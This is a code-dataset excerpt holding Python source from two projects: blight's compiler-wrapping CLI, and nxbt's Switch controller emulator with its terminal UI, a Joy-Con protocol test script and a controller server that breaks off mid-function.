repo_name
stringlengths
6
97
path
stringlengths
3
341
text
stringlengths
8
1.02M
thinkmoore/blight
src/blight/actions/__init__.py
<gh_stars>0 """ Actions supported by blight. """ from .benchmark import Benchmark # noqa: F401 from .find_outputs import FindOutputs # noqa: F401 from .inject_flags import InjectFlags # noqa: F401 from .record import Record # noqa: F401
thinkmoore/blight
src/blight/cli.py
import logging import os import shlex import shutil import stat import sys import tempfile from pathlib import Path import click import blight.tool from blight.exceptions import BlightError from blight.util import die logging.basicConfig(level=os.environ.get("BLIGHT_LOGLEVEL", "INFO").upper()) def _export(variable, value, *, quote=True): if quote: value = shlex.quote(value) print(f"export {variable}={value}") def _export_guess_wrapped(): for variable, tool in blight.tool.TOOL_ENV_MAP.items(): tool_path = shutil.which(tool) if tool_path is None: die(f"Couldn't locate {tool} on the $PATH") _export(f"BLIGHT_WRAPPED_{variable}", tool_path) def _swizzle_path(): blight_dir = Path(tempfile.mkdtemp(prefix="blight")) for variable, tool in blight.tool.TOOL_ENV_MAP.items(): shim_path = blight_dir / tool with open(shim_path, "w+") as io: io.write(f'blight-{tool} "${{@}}"\n') st = shim_path.stat() shim_path.chmod(st.st_mode | stat.S_IEXEC) # NOTE(ww): No quotation, to allow $PATH to expand. _export("PATH", f"{blight_dir}:$PATH", quote=False) @click.command() @click.option( "--guess-wrapped", help="Attempt to guess the appropriate programs to wrap", is_flag=True ) @click.option("--swizzle-path", help="Wrap via PATH swizzling", is_flag=True) def env(guess_wrapped, swizzle_path): if guess_wrapped: _export_guess_wrapped() if swizzle_path: _swizzle_path() for variable, tool in blight.tool.TOOL_ENV_MAP.items(): _export(variable, f"blight-{tool}") def tool(): # NOTE(ww): Specifically *not* a click command! wrapped_basename = os.path.basename(sys.argv[0]) tool_classname = blight.tool.BLIGHT_TOOL_MAP.get(wrapped_basename) if tool_classname is None: die(f"Unknown blight wrapper requested: {wrapped_basename}") tool_class = getattr(blight.tool, tool_classname) tool = tool_class(sys.argv[1:]) try: tool.run() except BlightError as e: die(str(e))
Yamakaky/nxbt
nxbt/tui.py
import os import time import psutil from collections import deque import multiprocessing from blessed import Terminal from .nxbt import Nxbt, PRO_CONTROLLER class LoadingSpinner(): SPINNER_CHARS = ['โ–  โ–ก โ–ก โ–ก', 'โ–ก โ–  โ–ก โ–ก', 'โ–ก โ–ก โ–  โ–ก', 'โ–ก โ–ก โ–ก โ– ', 'โ–ก โ–ก โ–ก โ– ', 'โ–ก โ–ก โ–  โ–ก', 'โ–ก โ–  โ–ก โ–ก', 'โ–  โ–ก โ–ก โ–ก'] # noqa def __init__(self): self.creation_time = time.perf_counter() self.last_update_time = self.creation_time self.current_char_index = 0 def get_spinner_char(self): current_time = time.perf_counter() delta = current_time - self.last_update_time if delta > 0.07: self.last_update_time = current_time if self.current_char_index == 7: self.current_char_index = 0 else: self.current_char_index += 1 return self.SPINNER_CHARS[self.current_char_index] class ControllerTUI(): CONTROLS = { "ZL": "โ—ฟโ–กโ–กโ–กโ–ก", "L": "โ—ฟโ–กโ–กโ–กโ–ก", "ZR": "โ–กโ–กโ–กโ–กโ—บ", "R": "โ–กโ–กโ–กโ–กโ—บ", "LS_UP": ".โ”€.", "LS_LEFT": "(", "LS_RIGHT": ")", "LS_DOWN": "`โ”€'", "RS_UP": ".โ”€.", "RS_LEFT": "(", "RS_RIGHT": ")", "RS_DOWN": "`โ”€'", "DPAD_UP": "โ–ณ", "DPAD_LEFT": "โ—", "DPAD_RIGHT": "โ–ท", "DPAD_DOWN": "โ–ฝ", "MINUS": "โ—Ž", "PLUS": "โ—Ž", "HOME": "โ–ก", "CAPTURE": "โ–ก", "A": "โ—‹", "B": "โ—‹", "X": "โ—‹", "Y": "โ—‹", } def __init__(self, term): self.term = term # Save a copy of the controls we can restore the # control text on deactivation self.DEFAULT_CONTROLS = self.CONTROLS.copy() self.CONTROL_RELEASE_TIMERS = self.CONTROLS.copy() for control in self.CONTROL_RELEASE_TIMERS.keys(): self.CONTROL_RELEASE_TIMERS[control] = False self.auto_keypress_deactivation = True self.remote_connection = False def toggle_auto_keypress_deactivation(self, toggle): """Toggles whether or not the ControllerTUI should deactivate a control after a period of time. :param toggle: A True/False value that toggles auto keypress deactivation :type toggle: bool """ self.auto_keypress_deactivation = toggle def set_remote_connection_status(self, status): """Sets whether or not the controller should render with remote connection specific controls. :param status: The status of the remote connection :type status: bool """ self.remote_connection = status def activate_control(self, key, activated_text=None): if activated_text: self.CONTROLS[key] = activated_text else: self.CONTROLS[key] = self.term.bold_black_on_white(self.CONTROLS[key]) # Keep track of when the key was pressed so we can release later if self.auto_keypress_deactivation: self.CONTROL_RELEASE_TIMERS[key] = time.perf_counter() def deactivate_control(self, key): self.CONTROLS[key] = self.DEFAULT_CONTROLS[key] def render_controller(self): if self.auto_keypress_deactivation: # Release any overdue timers for control in self.CONTROL_RELEASE_TIMERS.keys(): pressed_time = self.CONTROL_RELEASE_TIMERS[control] current_time = time.perf_counter() if pressed_time is not False and current_time - pressed_time > 0.25: self.deactivate_control(control) ZL = self.CONTROLS['ZL'] L = self.CONTROLS['L'] ZR = self.CONTROLS['ZR'] R = self.CONTROLS['R'] LU = self.CONTROLS['LS_UP'] LL = self.CONTROLS['LS_LEFT'] LR = self.CONTROLS['LS_RIGHT'] LD = self.CONTROLS['LS_DOWN'] RU = self.CONTROLS['RS_UP'] RL = self.CONTROLS['RS_LEFT'] RR = self.CONTROLS['RS_RIGHT'] RD = self.CONTROLS['RS_DOWN'] DU = self.CONTROLS['DPAD_UP'] DL = self.CONTROLS['DPAD_LEFT'] DR = self.CONTROLS['DPAD_RIGHT'] DD = self.CONTROLS['DPAD_DOWN'] MN = self.CONTROLS['MINUS'] PL = self.CONTROLS['PLUS'] HM = self.CONTROLS['HOME'] CP = self.CONTROLS['CAPTURE'] A = self.CONTROLS['A'] B = self.CONTROLS['B'] X = self.CONTROLS['X'] Y = self.CONTROLS['Y'] if self.remote_connection: lr_press = "L + R - - - - - - - - -โ–ท E" else: lr_press = " " print(self.term.home + self.term.move_y((self.term.height // 2) - 9)) print(self.term.center(f" {ZL} {ZR} ")) print(self.term.center(f" โ”€{L}โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€{R}โ”€ โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”")) print(self.term.center(" โ•ฑ โ•ฒ โ”‚ Controls โ”‚ Keys โ”‚")) print(self.term.center(f" โ•ฑ {LU} {MN} {PL} {X} โ•ฒ โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜")) # noqa print(self.term.center(f"โ”‚ {LL} {LR} {CP} {HM} {Y} {A} โ”‚ Left Stick โ”€ โ”€ โ”€ โ–ท W/A/S/D ")) # noqa print(self.term.center(f"โ”‚ {LD} {B} โ”‚ DPad โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท G/V/B/N ")) print(self.term.center(f"โ”‚ {DU} {RU} โ”‚ Capture/Home โ”€ โ”€ โ”€ โ”€ โ–ท [/] ")) print(self.term.center(f"โ”‚โ•ฒ {DL} โ–ก {DR} {RL} {RR} โ•ฑโ”‚ +/- โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€โ–ท 6/7 ")) # noqa print(self.term.center(f"โ”‚โ–‘โ–‘โ•ฒ {DD} {RD} โ•ฑโ–‘โ–‘โ”‚ X/Y/B/A โ”€ โ”€ โ”€ โ”€ โ”€โ–ท J/I/K/L ")) print(self.term.center("โ”‚โ–‘โ–‘โ–‘โ–‘โ•ฒ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ•ฑโ–‘โ–‘โ–‘โ–‘โ”‚ L/ZL โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท 1/2 ")) print(self.term.center("โ”‚โ–‘โ–‘โ–‘โ–‘โ•ฑ โ•ฒโ–‘โ–‘โ–‘โ–‘โ”‚ R/ZR โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ”€ โ–ท 8/9 ")) print(self.term.center("โ”‚โ–‘โ–‘โ•ฑ โ•ฒโ–‘โ–‘โ”‚ Right Stick - - - โ–ท Arrows ")) print(self.term.center(f"โ”‚โ•ฑ โ•ฒโ”‚ {lr_press} ")) class InputTUI(): KEYMAP = { # Left Stick Mapping "w": { "control": "LS_UP", "stick_data": { "stick_name": "L_STICK", "x": "+000", "y": "+100" } }, "a": { "control": "LS_LEFT", "stick_data": { "stick_name": "L_STICK", "x": "-100", "y": "+000" } }, "d": { "control": "LS_RIGHT", "stick_data": { "stick_name": "L_STICK", "x": "+100", "y": "+000" } }, "s": { "control": "LS_DOWN", "stick_data": { "stick_name": "L_STICK", "x": "+000", "y": "-100" } }, # Right Stick Mapping "KEY_UP": { "control": "RS_UP", "stick_data": { "stick_name": "R_STICK", "x": "+000", "y": "+100" } }, "KEY_LEFT": { "control": "RS_LEFT", "stick_data": { "stick_name": "R_STICK", "x": "-100", "y": "+000" } }, "KEY_RIGHT": { "control": "RS_RIGHT", "stick_data": { "stick_name": "R_STICK", "x": "+100", "y": "+000" } }, "KEY_DOWN": { "control": "RS_DOWN", "stick_data": { "stick_name": "R_STICK", "x": "+000", "y": "-100" } }, # Dpad Mapping "g": "DPAD_UP", "v": "DPAD_LEFT", "n": "DPAD_RIGHT", "b": "DPAD_DOWN", # Button Mapping "6": "MINUS", "7": "PLUS", "[": "CAPTURE", "]": "HOME", "i": "X", "j": "Y", "l": "A", "k": "B", # Triggers "1": "L", "2": "ZL", "8": "R", "9": "ZR", } def __init__(self, reconnect_target=None, debug=False, logfile=False): self.reconnect_target = reconnect_target self.term = Terminal() self.remote_connection = self.detect_remote_connection() self.controller = ControllerTUI(self.term) self.debug = debug self.logfile = logfile def detect_remote_connection(self): """Traverse up the parent processes and check if any have their parent as a remote daemon. If so, the python script is running under a remote connection. Remote shell detection is required for this TUI, due to keyboard input limitations on most remote connections. Specifically, no "keyup" events are sent when a key is released. Keyup events are required for proper input to the Switch, thus, we need to detect if the shell is a remote session and workaround this. :return: Returns a boolean value indicating whether or not the current script is running as SSH :rtype: bool """ remote_connection = False remote_process_names = ['sshd', 'mosh-server'] ppid = os.getppid() while ppid > 0: process = psutil.Process(ppid) if process.name() in remote_process_names: remote_connection = True break ppid = process.ppid() return remote_connection def start(self): self.mainloop(self.term) def mainloop(self, term): # Initializing a controller if not self.debug: self.nx = Nxbt(disable_logging=True) else: self.nx = Nxbt(debug=self.debug, logfile=self.logfile) self.controller_index = self.nx.create_controller( PRO_CONTROLLER, reconnect_address=self.reconnect_target) state = None spinner = LoadingSpinner() errors = None try: with term.cbreak(), term.keypad(), term.location(), term.hidden_cursor(): print(term.home + term.clear) self.render_top_bar(term) self.render_bottom_bar(term) self.render_start_screen(term, "Loading") inp = term.inkey(timeout=0) # Loading Screen while inp != chr(113): # Checking for q press # Check key at 15hz inp = term.inkey(timeout=1/30) new_state = self.nx.state[self.controller_index]["state"] if new_state != state: state = new_state loading_text = "Loading" if state == "initializing": loading_text = "Initializing Controller" elif state == "connecting": loading_text = "Connecting to any Nintendo Switch" elif state == "reconnecting": loading_text = "Reconnecting to Nintendo Switch" elif state == "connected": loading_text = "Connected!" elif state == "crashed": errors = self.nx.state[self.controller_index]["errors"] exit(1) self.render_start_screen(term, loading_text) print(term.move_y((term.height // 2) + 6)) if state != "connected": print(term.bold(term.center(spinner.get_spinner_char()))) else: print(term.center("")) if state == "connected": time.sleep(1) break # Main Gamepad Input Loop if state == "connected": if self.remote_connection: self.remote_input_loop(term) else: self.direct_input_loop(term) except KeyboardInterrupt: pass finally: print(term.clear()) if errors: print("The TUI encountered the following errors:") print(errors) def remote_input_loop(self, term): self.controller.set_remote_connection_status(True) inp = term.inkey(timeout=0) while inp != chr(113): # Checking for q press # Cutoff large buffered input from the deque # so that we avoid spamming the Switch after # a key releases from being held. # Increasing the size of the buffer does not # smooth out the jagginess of input. if len(term._keyboard_buf) > 1: term._keyboard_buf = deque([term._keyboard_buf.pop()]) inp = term.inkey(1/60) pressed_key = None if inp.is_sequence: pressed_key = inp.name elif inp: pressed_key = inp if pressed_key == 'e': self.controller.activate_control('L') self.controller.activate_control('R') self.nx.macro(self.controller_index, "L R 0.1s") else: try: control_data = self.KEYMAP[pressed_key] if type(control_data) == dict and "stick_data" in control_data.keys(): x_value = control_data['stick_data']['x'] y_value = control_data['stick_data']['y'] stick_name = control_data['stick_data']['stick_name'] self.controller.activate_control(control_data["control"]) self.nx.macro( self.controller_index, f"{stick_name}@{x_value}{y_value} 0.1s") else: self.controller.activate_control(control_data) self.nx.macro(self.controller_index, f"{control_data} 0.05s") except KeyError: pass self.controller.render_controller() self.check_for_disconnect(term) def direct_input_loop(self, term): # pynput must be imported here since earlier imports # will cause errors on remote connections from pynput import keyboard self.controller.toggle_auto_keypress_deactivation(False) self.exit_tui = False self.capture_input = True # Create a packet that is accessible from a multiprocessing Process # and from within threads packet_manager = multiprocessing.Manager() input_packet = packet_manager.dict() input_packet["packet"] = self.nx.create_input_packet() print(term.move_y(term.height - 5)) print(term.center(term.bold_black_on_white(" <Press esc to toggle input capture> "))) def on_press(key): # Parse the key press event pressed_key = None try: pressed_key = key.char except AttributeError: pressed_key = str(key).replace(".", "_").upper() if not self.capture_input: # If we're not capturing input, pass pass else: try: control_data = self.KEYMAP[pressed_key] packet = input_packet["packet"] if type(control_data) == dict and "stick_data" in control_data.keys(): stick_name = control_data['stick_data']['stick_name'] self.controller.activate_control(control_data["control"]) packet[stick_name][control_data["control"]] = True else: self.controller.activate_control(control_data) packet[control_data] = True input_packet["packet"] = packet except KeyError: pass def on_release(key): # Parse the key release event released_key = None try: released_key = key.char except AttributeError: released_key = str(key).replace(".", "_").upper() # If the esc key is released, toggle input capturing if released_key == "KEY_ESC": self.capture_input = not self.capture_input # Exit on q key press if released_key == 'q': self.exit_tui = True return False if not self.capture_input: # If we're not capturing input, pass pass else: try: control_data = self.KEYMAP[released_key] packet = input_packet["packet"] if type(control_data) == dict and "stick_data" in control_data.keys(): stick_name = control_data['stick_data']['stick_name'] self.controller.deactivate_control(control_data["control"]) packet[stick_name][control_data["control"]] = False else: self.controller.deactivate_control(control_data) packet[control_data] = False input_packet["packet"] = packet except KeyError: pass def input_worker(nxbt, controller_index, input_packet): while True: packet = input_packet["packet"] # Calculating left x/y stick values ls_x_value = 0 ls_y_value = 0 if packet["L_STICK"]["LS_LEFT"]: ls_x_value -= 100 if packet["L_STICK"]["LS_RIGHT"]: ls_x_value += 100 if packet["L_STICK"]["LS_UP"]: ls_y_value += 100 if packet["L_STICK"]["LS_DOWN"]: ls_y_value -= 100 packet["L_STICK"]["X_VALUE"] = ls_x_value packet["L_STICK"]["Y_VALUE"] = ls_y_value # Calculating right x/y stick values rs_x_value = 0 rs_y_value = 0 if packet["R_STICK"]["RS_LEFT"]: rs_x_value -= 100 if packet["R_STICK"]["RS_RIGHT"]: rs_x_value += 100 if packet["R_STICK"]["RS_UP"]: rs_y_value += 100 if packet["R_STICK"]["RS_DOWN"]: rs_y_value -= 100 packet["R_STICK"]["X_VALUE"] = rs_x_value packet["R_STICK"]["Y_VALUE"] = rs_y_value nxbt.set_controller_input(controller_index, packet) time.sleep(1/120) input_process = multiprocessing.Process( target=input_worker, args=(self.nx, self.controller_index, input_packet)) input_process.start() # Start a non-blocking keyboard event listener listener = keyboard.Listener( on_press=on_press, on_release=on_release) listener.start() # Main TUI Loop while True: if self.exit_tui: packet_manager.shutdown() input_process.terminate() break if not self.capture_input: print(term.home + term.move_y((term.height // 2) - 4)) print(term.bold_black_on_white(term.center(""))) print(term.bold_black_on_white(term.center( "<Input Paused. Press ESC Again to Begin Capturing Input>" ))) print(term.bold_black_on_white(term.center(""))) else: self.controller.render_controller() self.check_for_disconnect(term) time.sleep(1/120) def render_start_screen(self, term, loading_text): print(term.home + term.move_y((term.height // 2) - 8)) print(term.center("___โ•ฒโ•ฑ___")) print(term.center("โ”‚โ•ฒ โ•ฑโ•ฒ โ•ฑโ”‚")) print(term.center("โ”‚ โ•ฒโ•ฑ__โ•ฒโ•ฑ โ”‚")) print(term.center("โ”‚โ•ฑ โ•ฒโ”‚")) print(term.center("โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”")) print(term.center("โ”‚ NXBT TUI โ”‚")) print(term.center("โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜")) print(term.center("")) print(term.black_on_white(term.center(""))) print(term.bold_black_on_white(term.center(loading_text))) print(term.black_on_white(term.center(""))) def render_top_bar(self, term): print(term.move_y(1)) if self.remote_connection: print(term.bold_black_on_white(term.center(term.bold_black_on_red(" REMOTE MODE ")))) warning = " WARNING: MACROS WILL BE USED ON KEYPRESS DUE TO REMOTE CLI LIMITATIONS " print(term.center(term.black_on_red(warning))) else: print(term.bold_black_on_white(term.center("DIRECT INPUT MODE"))) print(term.move_y(1)) print(term.white_on_black(" NXBT TUI ๐ŸŽฎ ")) def render_bottom_bar(self, term): print(term.move_y(term.height)) print(term.center(term.bold_black_on_white(" <Press q to quit> "))) def check_for_disconnect(self, term): state = self.nx.state[self.controller_index]["state"] if state != 'connected': print(term.home + term.move_y((term.height // 2) - 4)) print(term.bold_black_on_red(term.center(""))) print(term.bold_black_on_red(term.center(state.title()))) print(term.bold_black_on_red(term.center(""))) while True: inp = term.inkey(1/30) if inp == chr(113): exit(1) elif self.nx.state[self.controller_index]["state"] == 'connected': break def main(): """Program entry point.""" tui = InputTUI() tui.start() if __name__ == '__main__': main()
Yamakaky/nxbt
scripts/switch_emu.py
""" Quick script to emulate a Switch connecting to a Joy-Con/Pro Controller. Note: If you get an Invalid Exchange error when running this script, this means that the Switch has paired to the controller, invalidating the original pairing key we created. You'll need to re-pair the controller to this device. """ import socket import sys import os import time from nxbt import toggle_input_plugin from nxbt import BlueZ REQUEST_INFO = b'\xA2\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_SHIPMENT = b'\xA2\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SERIAL_NUMBER = b'\xA2\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x60\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COLOURS = b'\xA2\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x10\x50\x60\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' INPUT_MODE = b'\xA2\x01\x0A\x00\x01\x40\x40\x00\x01\x40\x40\x03\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' TRIGGER_BUTTONS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS = b'\xA2\x01\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\x60\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_PARAMS_2 = b'\xA2\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x98\x60\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' USER_CAL = b'\xA2\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x80\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FACTORY_CAL = b'\xA2\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x10\x3D\x60\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SIX_AXIS_CAL = b'\xA2\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x10\x20\x60\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_IMU = b'\xA2\x01\x07\x00\x01\x40\x40\x00\x01\x40\x40\x40\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ENABLE_VIBRATION = b'\xA2\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_NFC_IR = b'\xA2\x01\x0C\x00\x01\x40\x40\x00\x01\x40\x40\x21\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' SET_PLAYER_LIGHTS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x30\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' FLASH_PLAYER_LIGHTS = b'\xA2\x01\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x30\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' COMMANDS = [ REQUEST_INFO, SET_SHIPMENT, SERIAL_NUMBER, COLOURS, INPUT_MODE, TRIGGER_BUTTONS, FACTORY_PARAMS, FACTORY_PARAMS_2, USER_CAL, FACTORY_CAL, SIX_AXIS_CAL, ENABLE_IMU, ENABLE_VIBRATION, SET_NFC_IR, ] def format_message(data, split, name): """Formats a given byte message in hex format split into payload and subcommand sections. :param data: A series of bytes :type data: bytes :param split: The location of the payload/subcommand split :type split: integer :param name: The name featured in the start/end messages :type name: string :return: The formatted data :rtype: string """ payload = "" subcommand = "" for i in range(0, len(data)): data_byte = str(hex(data[i]))[2:].upper() if len(data_byte) < 2: data_byte = "0" + data_byte if i <= split: payload += "0x" + data_byte + " " else: subcommand += "0x" + data_byte + " " formatted = ( f"--- {name} Msg ---\n" + f"Payload: {payload}\n" + f"Subcommand: {subcommand}") return formatted def print_msg_controller(data): """Prints a formatted message from a controller :param data: The bytes from the controller message :type data: bytes """ print(format_message(data, 13, "Controller")) def print_msg_switch(data): """Prints a formatted message from a Switch :param data: The bytes from the Switch message :type data: bytes """ print(format_message(data, 10, "Switch")) def wait_for_reply(itr): while True: data = itr.recv(350) print_msg_controller(data) if data[1] == 0x21: break if __name__ == "__main__": # Switch Controller Bluetooth MAC Address goes here jc_MAC = "98:B6:E9:B0:05:E7" port_ctrl = 17 port_itr = 19 # Joy-Con Sockets jc_ctrl = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) jc_itr = socket.socket(family=socket.AF_BLUETOOTH, type=socket.SOCK_SEQPACKET, proto=socket.BTPROTO_L2CAP) toggle_input_plugin(False) bt = BlueZ(adapter_path="/org/bluez/hci0") try: # Remove the device before we try to re-pair device_path = bt.find_device_by_address(jc_MAC) if not device_path: print("Device not paired. Pairing...") # Ensure we are paired/connected to the JC print("Attempting to re-pair with device") devices = bt.discover_devices(alias="Pro Controller", timeout=8) jc_device_path = None for key in devices.keys(): print(devices[key]["Address"]) if devices[key]["Address"] == jc_MAC: jc_device_path = key break if not jc_device_path: print("The specified Joy-Con could not be found") else: bt.pair_device(jc_device_path) print("Paired Joy-Con") bt.set_alias("Nintendo Switch") print("Connecting to Joy-Con: ", jc_MAC) jc_ctrl.connect((jc_MAC, port_ctrl)) jc_itr.connect((jc_MAC, port_itr)) print("Got connection.") # Initial Input report from Joy-Con jc_data = jc_itr.recv(350) print("Got initial Joy-Con Empty Report") print_msg_controller(jc_data) for command in COMMANDS: print_msg_switch(command) jc_itr.sendall(command) wait_for_reply(jc_itr) while True: data = jc_itr.recv(350) print_msg_controller(data) jc_itr.sendall(SET_PLAYER_LIGHTS) print_msg_switch(SET_PLAYER_LIGHTS) time.sleep(1/120) except KeyboardInterrupt: print("Closing sockets") jc_ctrl.close() jc_itr.close() try: sys.exit(1) except SystemExit: os._exit(1) except OSError as e: print("Closing sockets") jc_ctrl.close() jc_itr.close() raise e finally: toggle_input_plugin(True)
Yamakaky/nxbt
nxbt/controller/server.py
import socket import fcntl import os import time import queue import logging import traceback from .controller import Controller, ControllerTypes from ..bluez import BlueZ from .protocol import ControllerProtocol from .input import InputParser from .utils import format_msg_controller, format_msg_switch class ControllerServer(): def __init__(self, controller_type, adapter_path="/org/bluez/hci0", state=None, task_queue=None, lock=None, colour_body=None, colour_buttons=None): self.logger = logging.getLogger('nxbt') # Cache logging level to increase performance on checks self.logger_level = self.logger.level if state: self.state = state else: self.state = { "state": "", "finished_macros": [], "errors": None, "direct_input": None } self.task_queue = task_queue self.controller_type = controller_type self.colour_body = colour_body self.colour_buttons = colour_buttons if lock: self.lock = lock self.reconnect_counter = 0 # Intializing Bluetooth self.bt = BlueZ(adapter_path=adapter_path) self.controller = Controller(self.bt, self.controller_type) self.protocol = ControllerProtocol( self.controller_type, self.bt.address, colour_body=self.colour_body, colour_buttons=self.colour_buttons) self.input = InputParser(self.protocol) self.slow_input_frequency = False def run(self, reconnect_address=None): """Runs the mainloop of the controller server. :param reconnect_address: The Bluetooth MAC address of a previously connected to Nintendo Switch, defaults to None :type reconnect_address: string or list, optional """ self.state["state"] = "initializing" try: # If we have a lock, prevent other controllers # from initializing at the same time and saturating the DBus, # potentially causing a kernel panic. if self.lock: self.lock.acquire() try: self.controller.setup() if reconnect_address: itr, ctrl = self.reconnect(reconnect_address) else: itr, ctrl = self.connect() finally: if self.lock: self.lock.release() self.switch_address = itr.getsockname()[0] self.state["state"] = "connected" self.mainloop(itr, ctrl) except KeyboardInterrupt: pass except Exception: self.state["state"] = "crashed" self.state["errors"] = traceback.format_exc() return self.state def mainloop(self, itr, ctrl): # Mainloop while True: # Start timing the command processing timer_start = time.perf_counter() # Attempt to get output from Switch try: reply = itr.recv(50) if self.logger_level <= logging.DEBUG and len(reply) > 40: self.logger.debug(format_msg_switch(reply)) except BlockingIOError: reply = None # Getting any inputs from the task queue if self.task_queue: try: while True: msg = self.task_queue.get_nowait() if msg and msg["type"] == "macro": self.input.buffer_macro( msg["macro"], msg["macro_id"]) elif msg and msg["type"] == "stop": self.input.stop_macro( msg["macro_id"], state=self.state) elif msg and msg["type"] == "clear": self.input.clear_macros() except queue.Empty: pass # Set Direct Input if self.state["direct_input"]: self.input.set_controller_input(self.state["direct_input"]) self.protocol.process_commands(reply) self.input.set_protocol_input(state=self.state) msg = self.protocol.get_report() if self.logger_level <= logging.DEBUG and reply and len(reply) > 45: self.logger.debug(format_msg_controller(msg)) try: itr.sendall(msg) except BlockingIOError: continue except OSError as e: # Attempt to reconnect to the Switch itr, ctrl = self.save_connection(e) # Figure out how long it took to process commands timer_end = time.perf_counter() elapsed_time = (timer_end - timer_start) if self.slow_input_frequency: # Check if we can switch out of slow frequency input if self.input.exited_grip_order_menu: self.slow_input_frequency = False if elapsed_time < 1/15: time.sleep(1/15 - elapsed_time) else: # Respond at 120Hz for Pro Controller # or 60Hz for Joy-Cons. # Sleep timers are compensated with the elapsed command # processing time. if self.controller_type == ControllerTypes.PRO_CONTROLLER: if elapsed_time < 1/120: 